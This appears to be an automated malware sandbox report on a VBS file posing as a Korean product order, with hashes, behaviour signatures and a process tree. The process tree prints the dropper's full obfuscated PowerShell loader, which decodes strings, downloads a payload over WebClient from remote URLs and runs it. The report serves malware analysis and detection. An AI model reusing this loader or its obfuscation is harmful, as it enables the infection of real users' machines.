Overview

overview

8

Static

static

1

globe_prod...00.vbs

windows7-x64

6

globe_prod...00.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    296s
  • max time network
    303s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/11/2024, 06:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs

  • Size

    34KB

  • MD5

    cb6936ce8eb2ba2d521916070ab46b7c

  • SHA1

    8aa7fe3dca2da0bbbfe85e4373668120b111576e

  • SHA256

    fd3bf69fade10848b46e3d7c17d3fbcfdf66e0a500debaaad3d8a0dd4249d105

  • SHA512

    60be01c49abe96142b94a48d244f771f42198ed845e81b6f79bafd0252942923637d00fa9fde50d08023fd1e4c717d3f7c527f32fdd88c835924a1e773db3d5a

  • SSDEEP

    384:f9xJH9ENwdC0tLm5AJpOwVfHzSHh2/Ry0JZEjDkGxWxS7wUl8TlR:f9xd9ENwdfNZpOWfuh2533EnDH7oTH

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 37 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4244
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Transportingly Isogrammes Inconversant Misfiles Sikkativerne #><#Haletudsens Yaoort Minnesota Diskstationens Kitchenwards temporalises #>$Aandrig='Ldreinstitutionerne';function Unpunctuality($windsock){If ($host.DebuggerEnabled) {$Brockish=5} for ($Tenorfljtes18=$Brockish;;$Tenorfljtes18+=6){if(!$windsock[$Tenorfljtes18]) { break }$isiacal+=$windsock[$Tenorfljtes18]}$isiacal}function Tangue($Falkespors){ .($Driverrutiner) ($Falkespors)}$Rosmarinlyngs=Unpunctuality ' Bolin EcthELambsTKomm .SektiW De tE sixtBEre,icCissylIllumIUdlanesprkkn InofT';$Eliminators=Unpunctuality 'DovenMGassioLanguzTangsiHjnelloveralIndu a Trev/';$Forstrkningsbjlke121=Unpunctuality 'MisgeTSeme lasg,rsA bar1Blks 2';$Knne='Menst[OmskrN spaneh.miot Nudi.P edesS.riveBelgnrPiialvJ rnhIHloftC Gyr EVaaseP ,dgrO Pl,siKar oNK oenTSurheMSkattASt eanko,roaAlonegSyndiESlvgaRloxod] nshe:Su.re: F llSHv,rnePlumpCInterUHandsR.vrddILaplnTSteamY OverPAntiqrMismoOForaaTLituao rundCbetafO Pla lRadio=Pr.cu$ ssisFUranoO asserSup rSEpi,aT ,estrunrevKSplurNP radIdemenn wee g DecySKo btbHectajLoamiLOl.efkLejevE ordr1Larid2 Keto1';$Eliminators+=Unpunctuality 'Sdeba5Ninn,.Preci0Vildn Denta(LatinWSymboiceratn,rugedHabitoRailhwTappesSk bs Tur.eN FremTKontr Az go1roset0Kokse. Medg0Suble;W,rbl NoncoW S priUnappn kon 6Coggl4Prodi;Skibs dampsxSibyl6data.4 Indb;Posre Fo,flrKons.vRhino:Skjor1 orpo3 Biog1Antim.Polyn0skaer)Detai Oven GCykeleMikroc EmigkRhetooCochi/Drosk2Sjatt0 Fibr1Image0 Iml,0Menne1K,rto0Ompos1 ofel CrazFOxycai CrearDig ie Tr kfPa enoPastixmodfo/ mike1Romer3Milos1 redn.Kerne0';$pixilated=Unpunctuality 'Doer.UHopsaSHu boESnea,RSm dr- ApriaWastig amareLyrebN Fr sT';$Forbeholdslse=Unpunctuality ' AderhContrtKollitStoppp ortvsRo,bi:Cajol/Panto/Lyo.ygArte aS,vlerSancyhForgeo Un,iucgmkadOl.agjS ikkoStormuHi rnrGennemPl,sg. eplucDay roFedtkmUn fa/ UnabP Paa aDatafrshafttStent1Orion.HistopCelesnTrafig,pape> Udmeh VindtMandetPeni pnicobs Bibr: Krep/Frgeg/SupergFarvaaVariar synthCo umoRenisuFjerld SiskjKvr,boDisesuLaan,rSussomMonodoTil,lnPent e imeo.DiplocHick oM.ninmLabbe/AstroP TyngaInve,r Fir,tFugti1Kol b. Mulsp Dec.nSkelsg';$Prizable=Unpunctuality 'Silkw>';$Driverrutiner=Unpunctuality 'Traf iStudeeMudslx';$Oplysningstids='Pathicism';$Connubially='\Calusa.Saw';Tangue (Unpunctuality 'Sm ds$ AdneG PaaflOverhOCachaBLithoACentrLA rik:Laangs Sys Y evogMVaa ePPatieHimparY,ekldSHit eoGlavedBeas ANonpucInsemt ForbYResurl ,olkIKnevrAAnn,e1Stude4 Morr3 Afpa=Beken$HenvieTengsNRacerVprede:Ver ia iellp ouarp FrakDShellA FormtDo,deaFetog+ Non.$Cussoccir.uoBemgtn Une.n .orsu DyppBAd.enI MoleaArcatlre.leLNeuroy');Tangue (Unpunctuality ' Syns$ClairGsmaaslI.entO subcB EfteAAlbinlFas i: GaddeSilikXMell.iMaskeT ,etjupan,iR ,oldE,urfm=Sprog$ tje fSurr,o PincRBromobAni oE torthRangeo,adpolHamliDtransS Ro kL hillsReubeeD,lop..nholS Ost pSensoLMaks IHustatmaks (Brand$CargoPGlaucRRepreIProgrZsynodALentibHayfoL B doeForba)');Tangue (Unpunctuality $Knne);$Forbeholdslse=$Exiture[0];$Grundversionens=(Unpunctuality 'Uopst$SprttgSammeL OpkrO HoejB BlasAExorclI ent:Fo.bopSm.glRgalvaEFalsks stegsHyphaD behaoOliekmEfter=ArthrnTinglETom,awBibac-FornuOAustrBSkamfJB skreJernbCLindlTLettu ananaSProphYA.draSL nehTUnd reSultaM Whin.Pre e$Mine.rMisveo saarS Ida.mA,teraS.mspRFasa iEpitonEtag.LUdsmuYB bulnFavorgGeo eS');Tangue ($Grundversionens);Tangue (Unpunctuality ' Hde $Trivip ndur PorteTids,s .ritsAnnotdMans oPoniamBunke.SamspHUd oveaktueaMicrodTnd neD smarEskims Wu t[Uddre$,llempChauvi ParkxCac giKapnil .enzaOpgavtImmureWaistdViltr]photo=Kalku$Hel.aESeriol avouiUndermIncooiTrvlen Symma amvrtproteo Autor Esp s');$Harcellerede=Unpunctuality 'Unhon$ ecipFagomrKuld eEmnedshabitsMise dTunenoCountmDagp .SprgtD SlinoNoninwPh,non Pe ulMi seoHisp,aCruc dSpagnFversii egnelWarl e inte(Huske$ProgeFTidsloEventr FipebB syaeBiskoh,ecimoSvartlamalgdUnerrs retulStabesBlodkeShiph, Nona$Fa,tlELordlc ForhtPla,fi orphrKor eiEphrasForen)';$Ectiris=$Symphysodactylia143;Tangue (Unpunctuality 'Devla$wari GMermilMendiO Slimb LaurAAccepL Uspo:plantOchlorOBserehGaffee TaledE eri=Tau.u(Extratsagkye Je,nsNiveltDjaev- ChorPConstACerattPanelHStail Co ha$Udadle ImpicEpoxyT.ysseiG,nbrrSa.daiTaphosFaktu)');while (!$Oohed) {Tangue (Unpunctuality 'Photo$SubnegWachelStrafoModembGnideaU derlUnp,r:SelvhPH,nniyPaasmrEnteroCoggegSkridePodern anjo=Acoma$ChapoSEma.jt Kr,mrRepr acollyfcentrvKodsjr.verpdEndociExpurg BygghUdstae Escod') ;Tangue $Harcellerede;Tangue (Unpunctuality ',ritusApp ltHud laBofl.RTuskitS.als-bowdls FemolAntilEM tonE hattPSwath proro4');Tangue (Unpunctuality 'Millt$ mailgDefinLen osoUnjesBpal rAUlidelIndec:gy naOStudioSceneH Imp ECoaledUphan= Smre( AmbitChamae eavesWebertVapo -forblPSta dAAntivTPresehUphol n hed$GuttiEFarveCLig sTPreguIS,mplrU somiVerbaSUhomo)') ;Tangue (Unpunctuality '.atte$SkewiG Moc LF rstOSurfcb aisAAfmilL Undt:FaxenhBrayiY lacopSpeljn nomooUnschPDecamHRock oleakfBPico,i HjlaAAshamsChrys=,iona$FrdiggonobrLBar,eOKal uB mulaDronklMinst:ForstBGonofEOvervDOrdreeA,trkvpollei L ysL TegmlMontieanstrDDrist1Solec5Ildsl5Dec t+ Valg+ fter%Vigne$Dip oe Fla xSar oI.heloTSolsiuUdbulRNonree Sly .Brit c SpilOSupe uS orhnForhoT') ;$Forbeholdslse=$Exiture[$Hypnophobias]}$Laverestaaende=317883;$Tegneprocedurerne=32929;Tangue (Unpunctuality 'Acrop$ fficgA ebil RuskO DiskbHjernANonmeLStork:RetlifKloriIProcrLSg ngTRi oueQuestr ContEArbalTDetal Tr,en=Under Op,thgNyorieSvolvTForma-B,tnkC SatiOFenn,NServiTHostieBenbuNbagerT Ptil tele$ReinfELapsucFusiotKom ui ZoisRNgenhI.iskaS');Tangue (Unpunctuality ' Romb$ C,ntgBld rlDelraoSiksabsaltuaPaje l omle:,athisFetispVrigoi TilskAutheeTostahGummioHovedlMaliceResee ancho=Excis Anted[ P odS ompyUncols oliet Tu feskruemRepl . ikeC FortoMesornGibbyvT lleeChefrr Incrt Croi] Tilh: R.ag:ByggeFHorserMoniloberoemLa ouBBuk ea awksDerieeHuorn6 atal4Myx sSFisketWhatar B aci Fljtn esiggTautl(Trskr$ apitFMayfii LodglSkudltAn iheAcetar Butte AchitUd.mm)');Tangue (Unpunctuality 'Trett$HomosgThe gL B,deOMolarB Sv pAForstL,chap:Fireop gmeleduelltBeskarBlijvoKej,eLGr duEUnr suCuiramDr.ppmStykgeHypotN Ca is uto2Pern 5Firma3T.aie aflgg=bog i Ka ie[SvigesDe.feyOmopls Mndtt H lde .amfmHe.ti.SkeptT SbeoEIndtgxAdmirTBaand.Hemate LignNLetfoc,reenoS rdiDBrigaiLystsn SammGFulcr] Blom:H.per:nor.eA H.veSUniv,cSuperISvelniLasty. M,thG pproeTransTRungesRe.ertEndurr.emrei budgNUreglgUnqua( Stan$Ens bSseligpIn ucibil ek GentE NonihBi orONondelO.strEM xni)');Tangue (Unpunctuality 'Tu ul$ WhinGNed klHae oophallbB egna olicl Oply: S.ksaLimp RSwingbSta,nE P.tlj StikDKonstSPrepuTPseudI,oopsl UndelLikenAForkeD Tryke esthlC alcSFrs,ee nco=Foru $ CasapUndiseMislyTUppluRHks ko Pa,alTilbreFrowsUTo rcMPlastmMysteeDi.ignTkkenSVapo 2rette5Rigdo3Overs.ZoiatSHk enu xorBOveresAktratRebesRMuseriGeochN laongUnpub(Gothi$ emedlIndu,aGladsVInconEOmadrR Anale .isiSMisprTBikaraThixoA AllueTangeNNedfadO,tfaE Hete,Knbe $Pre,eTD yadE Signg,nderN PhotEGldspP AltdRNoncoosteriCDifflEtissedPreadU Monor TmmeE GrutrVegetnN nene Goba)');Tangue $Arbejdstilladelse;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1176

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ztuvqugf.c2k.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1176-0-0x00007FFF30AC3000-0x00007FFF30AC5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1176-1-0x00000280789C0000-0x00000280789E2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1176-11-0x00007FFF30AC0000-0x00007FFF31581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1176-12-0x00007FFF30AC0000-0x00007FFF31581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1176-13-0x00007FFF30AC0000-0x00007FFF31581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1176-14-0x00007FFF30AC3000-0x00007FFF30AC5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1176-15-0x00007FFF30AC0000-0x00007FFF31581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1176-16-0x00007FFF30AC0000-0x00007FFF31581000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1176-17-0x00007FFF30AC0000-0x00007FFF31581000-memory.dmp

    Filesize

    10.8MB

    Download